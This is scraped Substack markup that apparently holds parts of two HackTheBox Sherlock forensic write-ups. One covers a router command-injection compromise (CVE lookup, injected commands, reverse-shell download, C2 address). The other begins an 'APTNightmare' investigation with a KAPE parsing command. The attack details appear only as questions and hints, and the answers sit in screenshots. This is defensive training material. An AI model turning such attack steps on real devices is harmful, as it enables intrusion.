data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:268,&quot;width&quot;:213,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NS9s!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 424w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 848w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 1272w, https://substackcdn.com/image/fetch/$s_!NS9s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c0e4e3d-ed16-4d0c-901d-e14db27dd71b_213x268.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>7. Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?</strong></p><p>Inspect packet traffic streams in Wireshark to identify the manipulated HTTP parameter.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!iMA4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!iMA4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 424w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 848w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 1272w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!iMA4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png" width="1042" height="446" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:446,&quot;width&quot;:1042,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!iMA4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 424w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 848w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 1272w, https://substackcdn.com/image/fetch/$s_!iMA4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F147463e6-cf15-410c-a78c-5786b970b2e9_1042x446.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>8. What is the CVE number associated with the vulnerability that was exploited in this attack?</strong></p><p>Google RCE vulnerabilities for the router model TEW-827DRU.</p><p><strong>9. What was the first command the attacker executed by exploiting the vulnerability?</strong></p><p>Inspect the POST traffic in Wireshark.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hKj2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hKj2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 424w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 848w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 1272w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hKj2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png" width="662" height="363" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/844284a8-649f-4e41-992a-15417309e6f9_662x363.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:363,&quot;width&quot;:662,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hKj2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 424w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 848w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 1272w, https://substackcdn.com/image/fetch/$s_!hKj2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F844284a8-649f-4e41-992a-15417309e6f9_662x363.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>10. What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?</strong></p><p>Again, inspect the POST traffic for the relevant command.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hLtB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hLtB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 424w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 848w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 1272w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hLtB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png" width="1456" height="831" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:831,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hLtB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 424w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 848w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 1272w, https://substackcdn.com/image/fetch/$s_!hLtB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ed42927-c0b1-4ee4-95f9-b228c858cdbb_1483x846.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>11. Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?</strong></p><p>Follow the TCP streams of the POST requests to find the response message from the server when the attacker made a typo.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!h_ZW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!h_ZW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 424w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 848w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 1272w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!h_ZW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png" width="1456" height="666" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f691e360-87f0-491c-90c5-1449176878da_1832x838.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:666,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!h_ZW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 424w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 848w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 1272w, https://substackcdn.com/image/fetch/$s_!h_ZW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff691e360-87f0-491c-90c5-1449176878da_1832x838.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>13. What was the IP address and port number of the command and control (C2) server when the actor's reverse shell eventually did connect? (IP:Port)</strong></p><p>Open the .sh script in a text editor from the exported objects in Wireshark. The C2 IP and port are found in the script.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Yn0I!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Yn0I!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 424w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 848w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 1272w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Yn0I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png" width="608" height="165" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2d0470e1-9fdc-401f-9171-477816247116_608x165.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:165,&quot;width&quot;:608,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Yn0I!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 424w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 848w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 1272w, https://substackcdn.com/image/fetch/$s_!Yn0I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d0470e1-9fdc-401f-9171-477816247116_608x165.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[HackTheBox: APTNightmare]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-aptnightmare</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-aptnightmare</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 07 Feb 2025 22:30:52 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ARHC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>HTB Sherlock Write-Up</strong></p><p><strong>Scenario</strong></p><p>Our organization failed to prioritize robust security measures, resulting in a cyber attack that compromised both internal systems and customer data. The attack's origin and methods are unclear, and multiple suspicious emails have been detected. As a forensic investigator, your role is to analyze the evidence and uncover key details of the attack.</p><p><strong>1. What is the IP address of the infected web server?</strong></p><p>After extracting the contents of aptnightmare.zip, we find multiple files, including KAPE output data. Running the EZParser module on the target output allows us to parse forensic artifacts:</p><p>kape.exe --msource "C:\Users\username\Desktop\APTN1ghtm4r3\DiskImage" --module !EZParser --mdest "C:\Users\username\Desktop\KOUT\"</p><p>To quickly identify the infected web server, NetworkMiner is used for packet analysis.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ARHC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff324c649-aab1-44c1-a3b6-b8fae22dde2a_1467x326.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 